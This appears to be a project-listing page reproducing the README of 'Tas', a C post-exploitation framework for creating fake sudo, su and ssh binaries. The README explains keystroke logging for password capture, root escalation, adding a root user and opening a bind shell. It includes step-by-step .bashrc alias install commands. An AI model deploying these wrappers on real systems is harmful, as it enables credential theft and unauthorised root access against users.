All Projects → hc0d3r → Tas

hc0d3r / Tas

A tiny framework for easily manipulate the tty and create fake binaries.

Programming Languages

c
50402 projects - #5 most used programming language

Projects that are alternatives of or similar to Tas

Cyberweapons
Automated Cyber Offense
Stars: ✭ 64 (-53.28%)
Mutual labels:  keylogger
Rat Hodin V2.9
Remote Administration Tool for Linux
Stars: ✭ 97 (-29.2%)
Mutual labels:  keylogger
Postexploits
(windows) post exploitation: dll injection, process hollowing, RunPe, Keyloggers, UacByPass etc..
Stars: ✭ 111 (-18.98%)
Mutual labels:  keylogger
Awesome Terminals
Terminal Emulators
Stars: ✭ 80 (-41.61%)
Mutual labels:  tty
Zui
⬢ Zsh User Interface library – CGI+DHTML-like rapid application development with Zsh
Stars: ✭ 95 (-30.66%)
Mutual labels:  tty
Dte
A small, configurable console text editor (moved to https://gitlab.com/craigbarnes/dte)
Stars: ✭ 98 (-28.47%)
Mutual labels:  tty
Tinkerershell
A simple python reverse shell written just for fun.
Stars: ✭ 62 (-54.74%)
Mutual labels:  keylogger
Flux Keylogger
🔖 Modern Javascript keylogger with web panel
Stars: ✭ 122 (-10.95%)
Mutual labels:  keylogger
Wifipassword Stealer
Get All Registered Wifi Passwords from Target Computer.
Stars: ✭ 97 (-29.2%)
Mutual labels:  keylogger
Inferno
🔥 Modern command line tool for malware creation on Windows
Stars: ✭ 105 (-23.36%)
Mutual labels:  keylogger
Keylogger
A powerful C keylogger for Windows.
Stars: ✭ 89 (-35.04%)
Mutual labels:  keylogger
Spykeyboard
keylogger which sends us the data to our gmail.
Stars: ✭ 95 (-30.66%)
Mutual labels:  keylogger
Tty Exit
Terminal exit codes.
Stars: ✭ 101 (-26.28%)
Mutual labels:  tty
Tty Prompt
A beautiful and powerful interactive command line prompt
Stars: ✭ 1,210 (+783.21%)
Mutual labels:  tty
Termion
Mirror of https://gitlab.redox-os.org/redox-os/termion
Stars: ✭ 1,654 (+1107.3%)
Mutual labels:  tty
Gritty
web terminal emulator
Stars: ✭ 63 (-54.01%)
Mutual labels:  tty
Keylogger
🔐 Open Source Python Keylogger Collection
Stars: ✭ 97 (-29.2%)
Mutual labels:  keylogger
Galacritty
WIP GTK terminal emulator based on Alacritty
Stars: ✭ 136 (-0.73%)
Mutual labels:  tty
Xterm.js
A terminal for the web
Stars: ✭ 12,019 (+8672.99%)
Mutual labels:  tty
Cromos
Cromos is a tool for downloading legitimate extensions of the Chrome Web Store and inject codes in the background of the application.
Stars: ✭ 103 (-24.82%)
Mutual labels:  keylogger

TAS

A tiny framework for easily manipulate the tty and create fake binaries.

How it works?

The framework has three main functions, tas_execv, tas_forkpty, and tas_tty_loop.

  • tas_execv: It is a function similar to execv, but it doesn't re-execute the current binary, something very useful for creating fake binaries.

  • tas_forkpty: Is the same as forkpty, but it fills a custom structure, check forkpty man page for more details.

  • tas_tty_loop: here is where the manipulation of the tty happen, you can set a hook function for the input and output, so it is possible to store the keys typed by the user or manipulate the terminal output. (see leet-shell).

This is a superficial overview, check the codes in tas/fakebins/fun folders to understand how it really works.

Fakebins

Through manipulation of the PATH environment variable, or by using bash's aliases (or any other shell that supports aliases), you can run another program instead of the program that the user usually runs. This makes it possible to capture keystrokes and modify the command line to change the original program behavior.

Change the command line of some programs, like sudo and su, can lead to privilege escalation.

I'd created three programs as an example of what you can do with the framework: sudo, su and generic-keylogger.

generic-keylogger

The generic-keylogger, as the name suggests, is a binary that acts like a keylogger, the main idea is to use it to get passwords of programs like ssh, mysql, etc.

sudo/su

It can be used as a keylogger, or you can run some of the modules as root, by manipulating the command line.

Step-by-step cmd change:

The user types sudo cmd
fakesudo cmd runs
The fakesudo executes sudo fakesudo cmd

After it is running as root, the fakesudo create a child process for executing some of the modules, and in the main PID, it runs the original command.

Note: fakesudo only changes the command if the user runs sudo cmd [args], if some additional flags are used, then the command isn't touched.

Almost the same process happens with the su:

The user types su -
fakesu - runs
The fakesu executes su - -c fakesu

After it is running as root, the fakesu create a child process for executing some of the modules, and in the main PID, it runs bash -i

Note: fakesu only changes the command if the user runs su or su -, if some additional flags are used, then the command isn't touched.

Modules

For now, there are only three modules:

  • add-root-user - creates a root user with password in /etc/passwd.
  • bind-shell - listen for incoming connections and spawn a tty shell.
  • system - executes a command as root.

I can add more modules in the future, but if you are familiar with the C language, I believe that it is not very difficult to change the programs to run what you want as root, just modify a few lines of code and change the super() function.

Building

First, build the base library:

$ make
  CC .obj/globals.o
  CC .obj/getinode.o
  CC .obj/tas-execv.o
  CC .obj/tty.o
  CC .obj/xreadlink.o
  AR .obj/libtas.a

After that, you can build generic-keylogger, sudo or su, by running make [target-bin]

Example:

$ make su
make[1]: Entering directory '/home/test/tas/fakebins/su'
[+] configuring fakesu ...
enable keylogger? [y/N] y
number of lines to record [empty = store all]:
logfile (default: /tmp/.keys.txt):
use some FUN modules? [y/N] n
[+] configuration file created in /home/test/tas/fakebins/su/config.h
  CC su
make[1]: Leaving directory '/home/test/tas/fakebins/su'

Examples

Creating a fakessh:

Compile:

$ make generic-keylogger
make[1]: Entering directory '/home/test/tas/fakebins/generic-keylogger'
[+] configuring generic-keylogger ...
number of lines to record [empty = store all]: 3
logfile (default: /tmp/.keys.txt):
[+] configuration file created in /home/test/tas/fakebins/generic-keylogger/config.h
  CC generic-keylogger
make[1]: Leaving directory '/home/test/tas/fakebins/generic-keylogger'

Install:

$ mkdir ~/.bin
$ cp generic-keylogger ~/.bin/ssh
$ echo "alias ssh='$HOME/.bin/ssh'" >> ~/.bashrc

In action:

Demo

Using the bind-shell module

Compile:

make[1]: Entering directory '/home/test/tas/fakebins/sudo'
[+] configuring fakesudo ...
enable keylogger? [y/N] n
use some FUN modules? [y/N] y
[1] add-root-user
[2] bind-shell
[3] system
[4] cancel
> 2
listen port (Default: 1337): 5992
[+] configuration file created in /home/test/tas/fakebins/sudo/config.h
  CC sudo
make[1]: Leaving directory '/home/test/tas/fakebins/sudo'

Install:

$ cp sudo ~/.sudo
$ echo "alias sudo='$HOME/.sudo'" >> ~/.bashrc

In action:

Demo

leet-shell

leet-shell is an example of how you can manipulate the tty output, it allows you to use the bash like a 1337 h4x0r.

[test@alfheim tas]$ make fun/leet-shell
  CC fun/leet-shell
[[email protected] tas]$ fun/leet-shell
SP4WN1NG L33T SH3LL H3R3 !!!
[[email protected] t4s]$ 3ch0 'l33t sh3ll 1s l33t !!!'
l33t sh3ll 1s l33t !!!

Notes

Somethings can make the fake-programs not work as expected:

  • whitelisted sudo commands.
  • /proc/ unvaliable (/proc/self/exe is used to obtain the binary fullname).

The sudo will always ask for the password when the keylogger function is used in the fakesudo.

How to protect yourself?
This is a post-exploitation technique to performs privilege escalation and information gathering, if you want to protect yourself, not be invaded is a good way to start...

Contributing

You can help with code, or donating money. If you wanna help with code, use the kernel code style as a reference.

Paypal:

BTC: 1PpbrY6j1HNPF7fS2LhG9SF2wtyK98GSwq

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].